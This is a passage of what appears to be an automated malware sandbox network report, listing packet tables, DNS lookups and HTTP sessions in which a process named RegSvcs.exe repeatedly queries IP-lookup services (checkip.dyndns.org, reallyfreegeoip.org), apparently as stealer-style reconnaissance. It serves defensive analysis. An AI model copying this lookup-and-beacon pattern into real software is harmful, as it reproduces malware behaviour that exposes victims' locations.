Jan 11, 2025 03:45:31.405443907 CET	49863	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:31.405469894 CET	443	49863	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:31.552747011 CET	443	49863	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:31.552817106 CET	443	49863	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:31.552906990 CET	49863	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:31.553443909 CET	49863	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:31.694266081 CET	49788	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:31.694710016 CET	49855	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:32.591072083 CET	80	49866	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:32.596558094 CET	49866	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:32.601492882 CET	80	49866	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:32.908710957 CET	80	49866	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:32.950520039 CET	49866	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:32.950934887 CET	49875	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:32.950984955 CET	443	49875	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:32.951535940 CET	49875	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:32.955296040 CET	49875	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:32.955316067 CET	443	49875	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:33.421993017 CET	443	49875	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:33.422578096 CET	49875	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:33.426575899 CET	49875	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:33.426600933 CET	443	49875	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:33.426930904 CET	443	49875	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:33.479027987 CET	49875	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:33.519339085 CET	443	49875	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:33.595442057 CET	443	49875	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:33.595509052 CET	443	49875	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:33.595590115 CET	49875	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:33.599463940 CET	49875	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:33.604463100 CET	49866	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:33.609277964 CET	80	49866	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:33.902832031 CET	80	49866	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:33.905447960 CET	49880	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:33.905498981 CET	443	49880	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:33.905564070 CET	49880	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:33.905807972 CET	49880	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:33.905819893 CET	443	49880	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:33.951348066 CET	49866	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:34.369582891 CET	443	49880	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:34.371855021 CET	49880	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:34.371887922 CET	443	49880	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:34.512726068 CET	443	49880	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:34.512809038 CET	443	49880	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:34.512967110 CET	49880	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:34.513470888 CET	49880	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:34.517030001 CET	49866	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:34.518204927 CET	49886	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:34.522206068 CET	80	49866	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:34.522314072 CET	49866	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:34.523073912 CET	80	49886	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:34.523159027 CET	49886	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:34.523240089 CET	49886	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:34.528363943 CET	80	49886	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:36.445107937 CET	80	49886	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:36.446734905 CET	49901	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:36.446783066 CET	443	49901	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:36.446871042 CET	49901	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:36.447176933 CET	49901	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:36.447187901 CET	443	49901	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:36.497396946 CET	49886	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:36.902441978 CET	443	49901	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:36.909373045 CET	49901	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:36.909405947 CET	443	49901	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:37.023410082 CET	443	49901	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:37.023571968 CET	443	49901	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:37.023677111 CET	49901	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:37.024033070 CET	49901	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:37.029192924 CET	49905	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:37.034086943 CET	80	49905	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:37.034228086 CET	49905	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:37.034333944 CET	49905	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:37.039228916 CET	80	49905	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:38.870908022 CET	80	49905	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:38.872598886 CET	49919	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:38.872644901 CET	443	49919	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:38.872730970 CET	49919	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:38.872986078 CET	49919	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:38.872998953 CET	443	49919	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:38.919344902 CET	49905	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:39.353949070 CET	443	49919	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:39.355737925 CET	49919	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:39.355773926 CET	443	49919	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:39.484397888 CET	443	49919	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:39.484466076 CET	443	49919	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:39.484515905 CET	49919	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:39.485027075 CET	49919	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:39.496634007 CET	49905	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:39.497987032 CET	49924	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:39.501570940 CET	80	49905	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:39.501647949 CET	49905	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:39.502779961 CET	80	49924	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:39.502836943 CET	49924	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:39.502974987 CET	49924	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:39.507746935 CET	80	49924	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:41.497575998 CET	80	49924	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:41.498873949 CET	49937	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:41.498910904 CET	443	49937	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:41.498976946 CET	49937	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:41.499216080 CET	49937	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:41.499224901 CET	443	49937	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:41.544302940 CET	49924	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:42.006472111 CET	443	49937	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:42.008349895 CET	49937	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:42.008373022 CET	443	49937	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:42.144444942 CET	443	49937	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:42.144524097 CET	443	49937	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:42.145059109 CET	49937	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:42.145522118 CET	49937	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:42.148755074 CET	49924	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:42.149841070 CET	49941	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:42.153697968 CET	80	49924	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:42.154654980 CET	80	49941	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:42.158660889 CET	49924	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:42.158691883 CET	49941	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:42.158795118 CET	49941	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:42.163492918 CET	80	49941	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:42.979140043 CET	80	49941	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:42.980585098 CET	49947	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:42.980631113 CET	443	49947	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:42.980724096 CET	49947	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:42.981137037 CET	49947	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:42.981149912 CET	443	49947	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:43.028732061 CET	49941	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:43.457040071 CET	443	49947	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:43.459408998 CET	49947	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:43.459438086 CET	443	49947	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:43.614454031 CET	443	49947	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:43.614624023 CET	443	49947	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:43.614692926 CET	49947	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:43.615356922 CET	49947	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:43.619260073 CET	49941	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:43.620796919 CET	49953	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:43.624315023 CET	80	49941	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:43.624388933 CET	49941	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:43.625750065 CET	80	49953	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:43.625889063 CET	49953	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:43.625993013 CET	49953	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:43.630820036 CET	80	49953	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:44.483510017 CET	80	49953	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:44.484966040 CET	49959	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:44.485014915 CET	443	49959	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:44.485095978 CET	49959	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:44.485382080 CET	49959	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:44.485394955 CET	443	49959	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:44.528814077 CET	49953	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:44.958986044 CET	443	49959	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:44.961108923 CET	49959	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:44.961198092 CET	443	49959	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:45.107801914 CET	443	49959	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:45.107886076 CET	443	49959	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:45.108068943 CET	49959	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:45.108716965 CET	49959	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:45.112277031 CET	49953	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:45.113591909 CET	49964	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:45.117331982 CET	80	49953	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:45.117455959 CET	49953	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:45.118446112 CET	80	49964	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:45.118535042 CET	49964	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:45.118638992 CET	49964	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:45.123465061 CET	80	49964	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:46.982456923 CET	80	49964	132.226.8.169	192.168.2.11
Jan 11, 2025 03:45:46.983942032 CET	49978	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:46.984004021 CET	443	49978	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:46.984088898 CET	49978	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:46.984364033 CET	49978	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:46.984378099 CET	443	49978	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:47.028887033 CET	49964	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:47.442806005 CET	443	49978	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:47.444396973 CET	49978	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:47.444458961 CET	443	49978	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:47.589195013 CET	443	49978	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:47.589359999 CET	443	49978	104.21.64.1	192.168.2.11
Jan 11, 2025 03:45:47.589754105 CET	49978	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:47.589859009 CET	49978	443	192.168.2.11	104.21.64.1
Jan 11, 2025 03:45:47.691869020 CET	49964	80	192.168.2.11	132.226.8.169
Jan 11, 2025 03:45:47.691951990 CET	49886	80	192.168.2.11	132.226.8.169

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 03:45:14.541271925 CET	55044	53	192.168.2.11	1.1.1.1
Jan 11, 2025 03:45:14.548331976 CET	53	55044	1.1.1.1	192.168.2.11
Jan 11, 2025 03:45:17.179132938 CET	61433	53	192.168.2.11	1.1.1.1
Jan 11, 2025 03:45:17.185787916 CET	53	61433	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 03:45:14.541271925 CET	192.168.2.11	1.1.1.1	0x466b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:17.179132938 CET	192.168.2.11	1.1.1.1	0xf8b2	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 03:45:14.548331976 CET	1.1.1.1	192.168.2.11	0x466b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 03:45:14.548331976 CET	1.1.1.1	192.168.2.11	0x466b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:14.548331976 CET	1.1.1.1	192.168.2.11	0x466b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:14.548331976 CET	1.1.1.1	192.168.2.11	0x466b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:14.548331976 CET	1.1.1.1	192.168.2.11	0x466b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:14.548331976 CET	1.1.1.1	192.168.2.11	0x466b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:17.185787916 CET	1.1.1.1	192.168.2.11	0xf8b2	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:17.185787916 CET	1.1.1.1	192.168.2.11	0xf8b2	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:17.185787916 CET	1.1.1.1	192.168.2.11	0xf8b2	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:17.185787916 CET	1.1.1.1	192.168.2.11	0xf8b2	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:17.185787916 CET	1.1.1.1	192.168.2.11	0xf8b2	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:17.185787916 CET	1.1.1.1	192.168.2.11	0xf8b2	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:45:17.185787916 CET	1.1.1.1	192.168.2.11	0xf8b2	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49744	132.226.8.169	80	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:14.558662891 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:15.673197031 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 03:45:15.681555986 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 03:45:17.091970921 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 03:45:18.024549007 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 03:45:18.302985907 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49774	132.226.8.169	80	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:18.939347029 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 03:45:19.760684967 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49788	132.226.8.169	80	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:20.565150976 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 03:45:23.405455112 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49810	132.226.8.169	80	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:24.018806934 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:25.230333090 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49826	132.226.8.169	80	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:25.866473913 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:27.044419050 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49842	132.226.8.169	80	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:27.804625988 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:45:29.423918009 CET	273	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:45:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49855	132.226.8.169	80	7764	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:45:30.095334053 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
